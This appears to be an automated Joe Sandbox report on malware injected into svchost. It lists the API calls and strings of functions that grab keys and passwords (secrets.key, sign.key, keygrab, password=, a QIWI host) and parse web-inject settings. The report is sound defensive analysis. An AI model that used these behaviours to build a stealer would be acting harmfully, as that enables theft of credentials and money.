                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashMutex$ExistsFileHandleOpenSleepThread$CloseCreateInformationReleaseTerminate
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0#v$pass.log$path.txt
                                                                                                                                                                                                                    • API String ID: 2618501214-107084094
                                                                                                                                                                                                                    • Opcode ID: f6fe511270f52497d6a7ce7f31b185b996bfeda6af1d9b2f39a4b145b2bdaf5d
                                                                                                                                                                                                                    • Instruction ID: 7473a13c26f8500dcefc51da46215b1b2887353ab3188e9ed7c6671aa70f9290
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6fe511270f52497d6a7ce7f31b185b996bfeda6af1d9b2f39a4b145b2bdaf5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6515831A847819BD716EB289C54BA7BBD4AFC6708F188A58F885D7240DB70DD08C795
                                                                                                                                                                                                                    Function 02C71000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 156memorythreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02C7149C,00000000,?), ref: 02C7101B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000013,7622F570,?,02C7149C,00000000,?), ref: 02C7103E
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71045
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C71055
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,7622F570,?,02C7149C,00000000,?), ref: 02C71073
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02C7149C,00000000,?), ref: 02C71093
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C906E0,00000000,00000000,00000000), ref: 02C710A3
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8F1B0,00000000,00000000,00000000), ref: 02C710D0
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,\secrets.key,?,?,02C7149C,00000000,?), ref: 02C710EC
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,sign.key,?,02C7149C,00000000,?), ref: 02C71102
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C911C0,00000000,00000000,00000000), ref: 02C7111B
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,?,02C7149C,00000000,?), ref: 02C7112F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71140
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71155
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71158
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71164
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71167
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                                    • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                                    • API String ID: 3254303593-2345338882
                                                                                                                                                                                                                    • Opcode ID: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
                                                                                                                                                                                                                    • Instruction ID: 4ba0e2f269905619e1da183914577106412ee6c3aa111e834bdfd4dedbef0bba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A741E731A401A17B9B326A665C8CEAB7B7CDFC6F94F088719F919A7040DB71C611C6B0
                                                                                                                                                                                                                    Function 02C903A0 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 129stringthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C903E9
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C903FC
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C9040F
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF57), ref: 02C9043D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF57), ref: 02C90473
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,7F1BFF57), ref: 02C90488
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C90492
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C9049A
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C904AB
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C904B2
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C904BF
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90540,00000000,00000000,00000000), ref: 02C90508
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C90520
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90531
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Pathstrstr$BackslashCreateDirectoryErrorHandleLast$AdminCloseCurrentFolderInformationMakeSystemThreadUser
                                                                                                                                                                                                                    • String ID: 7F1BFF57$GET $pass.txt$password=$phone=$w.qiwi.ru
                                                                                                                                                                                                                    • API String ID: 554474407-1504432680
                                                                                                                                                                                                                    • Opcode ID: 36107d2cb671c7c4823b7a1f227206b526096c78df2eb944ec67ef2b892598c4
                                                                                                                                                                                                                    • Instruction ID: 2a174f549657d50b6b9ead6a098b81d6fee8c9a1354c359d70f9939a41d377c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36107d2cb671c7c4823b7a1f227206b526096c78df2eb944ec67ef2b892598c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD415931E4025D9BEF218E34AC5CBEB7BACAF81705F244698F88597140EB70D685CB95
                                                                                                                                                                                                                    Function 02C89FE9 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 129sleepsynchronizationfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB2A0,00000000), ref: 02C8A041
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8A047
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8A04F
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB2A0), ref: 02C8A05E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8A065
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8A09B
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,02CCB2A0,00000000), ref: 02C8A0D3
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A0E6
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8A0F7
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8A0FA
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8A10C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateErrorLastMutexPathSleep$AdminBackslashCopyDirectoryFileFolderHandleInformationMakeReleaseSystemUser
                                                                                                                                                                                                                    • String ID: 7f1bfc59$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 2754757069-1854995306
                                                                                                                                                                                                                    • Opcode ID: 59495722ea5c84c1fe7536fb17816220eef3dcba5d1c1633ff2f0d8705cc4f22
                                                                                                                                                                                                                    • Instruction ID: 9dbeddafe6ca522f76295b8ff74685d63b30fd7363d1d50eb135df50acfb3d80
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59495722ea5c84c1fe7536fb17816220eef3dcba5d1c1633ff2f0d8705cc4f22
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19414831A406959BE7122B349C1977B3F98AF89749F098659FC47C7280CB71CA00C7D1
                                                                                                                                                                                                                    Function 02C8FA10 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41,?,7693BF00), ref: 02C8FA40
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8FA81
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,7693BF00), ref: 02C8FA8B
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8FA93
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8FAA4
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,7693BF00), ref: 02C8FAAB
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,7693BF00), ref: 02C8FAEA
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,7693BF00), ref: 02C8FAF7
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,7693BF00), ref: 02C8FB40
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,7693BF00), ref: 02C8FB5C
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,?,00000104,?,7693BF00), ref: 02C8FB79
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75AF5CE0,?,02C82840,?), ref: 02C97B63
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97B66
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: memset.MSVCRT ref: 02C97B7B
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,7693BF00), ref: 02C8FBA8
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41,?,7693BF00), ref: 02C8FBC7
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8FC2B
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,7693BF00), ref: 02C8FC38
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75AF5CE0), ref: 02C97D61
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: _snprintf.MSVCRT ref: 02C97D7D
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: FindFirstFileA.KERNEL32(00000000,?), ref: 02C97D8C
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: LocalFree.KERNEL32(00000000), ref: 02C97D99
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DD8
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DE6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                                    • String ID: 7F1BFF41$\$inter.zip$path.txt
                                                                                                                                                                                                                    • API String ID: 3082343898-1629773178
                                                                                                                                                                                                                    • Opcode ID: 88ed06e52fdd07e588f9949737f65c1daa6bdc6c799b508618e784c988bddfa0
                                                                                                                                                                                                                    • Instruction ID: 9bb7c9631274bbb94ac3368ab62ddaff185e6de9522194c02445509fab95a5b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88ed06e52fdd07e588f9949737f65c1daa6bdc6c799b508618e784c988bddfa0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 036178309406855FDB22DB249CA8BFBBBE9AF85304F5086D8E989D7150DB70DA89CB50
                                                                                                                                                                                                                    Function 02C811D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C81130: memset.MSVCRT ref: 02C81152
                                                                                                                                                                                                                      • Part of subcall function 02C81130: GetParent.USER32(?), ref: 02C8115E
                                                                                                                                                                                                                      • Part of subcall function 02C81130: GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
                                                                                                                                                                                                                      • Part of subcall function 02C81130: StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD858,?,?), ref: 02C81206
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?,?,00000000), ref: 02C81234
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,?), ref: 02C81248
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C81259
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8125F
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C81268
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C81279
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C81283
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,keygrab), ref: 02C81295
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C812A0
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C812A6
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C812AE
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C812BF
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C812C6
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C812D3
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C81303
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD858,?), ref: 02C81323
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$ErrorLast$AdminAppendBackslashCreateCriticalDirectoryFolderMakeSectionSystemUser$EnterLeaveParentTextWindow_snprintfmemset
                                                                                                                                                                                                                    • String ID: %02u.bmp$keygrab
                                                                                                                                                                                                                    • API String ID: 2122597915-4222822809
                                                                                                                                                                                                                    • Opcode ID: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
                                                                                                                                                                                                                    • Instruction ID: f38ad4d4ce2a83df3e94e43d01db13399269dc43d253f1200e0522f9340ea6d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9531C2759402599BDB11EBB4DC48BDA77BCEF88305F088A94E589C3000DFB0DA96CF90
                                                                                                                                                                                                                    Function 02C80240 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD840,00000000,00000000,75C39E60,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C80250
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000020,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802B8
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802BF
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8033F
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C80359
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C80373
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8038D
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C803B7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02C803D4
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C803DB
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C80504
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8053C
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8053F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8054C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8054F
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD840,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C8055A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                                    • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                                    • API String ID: 2387113551-2328515424
                                                                                                                                                                                                                    • Opcode ID: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
                                                                                                                                                                                                                    • Instruction ID: 862d923f2d4cfc4ddbe5a02576eeefa2444832840683b132483696eb5dc3c8e8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BA1E2719447419FDB22DF34C8947A6BFE5AF85308F14C6ACD88A8B242EB71D60DCB91
                                                                                                                                                                                                                    Function 02C8D268 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 235COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFCBF), ref: 02C8D284
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFCBF,?,?), ref: 02C8D389
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D3C3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8D3CD
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8D3D5
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D3E4
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8D3EB
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Error$LastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Mode
                                                                                                                                                                                                                    • String ID: .txt$.zip$7F1BFCBF$keys$path
                                                                                                                                                                                                                    • API String ID: 3293890905-3130204430
                                                                                                                                                                                                                    • Opcode ID: 4e8c0907a3706a68fe3ef888ca7144b3ee322088e14f14862d275d065ea671d8
                                                                                                                                                                                                                    • Instruction ID: aee6f32301bdcdfa9a6d4cc34bc4f8d0ee578be413322cb3f489d5fcad6d9f42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e8c0907a3706a68fe3ef888ca7144b3ee322088e14f14862d275d065ea671d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB81E9315086868FC716DB3894687ABBBE5EFC5349F18CA58E8CAD7241EB31D509C781
                                                                                                                                                                                                                    Function 02C89BE0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 189memoryfilestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C89C00
                                                                                                                                                                                                                      • Part of subcall function 02C89B20: PathAddBackslashA.SHLWAPI(7F1BFC6B), ref: 02C89B47
                                                                                                                                                                                                                      • Part of subcall function 02C89B20: GetFileAttributesA.KERNEL32(?), ref: 02C89B85
                                                                                                                                                                                                                      • Part of subcall function 02C89B20: PathFileExistsA.SHLWAPI(?), ref: 02C89BC9
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC6B), ref: 02C89C48
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C89CB0
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C89CBD
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC6B,?,?), ref: 02C89CF7
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C89D7A
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02C89D8E
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C89DA1
                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02C89DD0
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC6B), ref: 02C89DDB
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C89DFE
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C89E01
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C89E0E
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C89E11
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
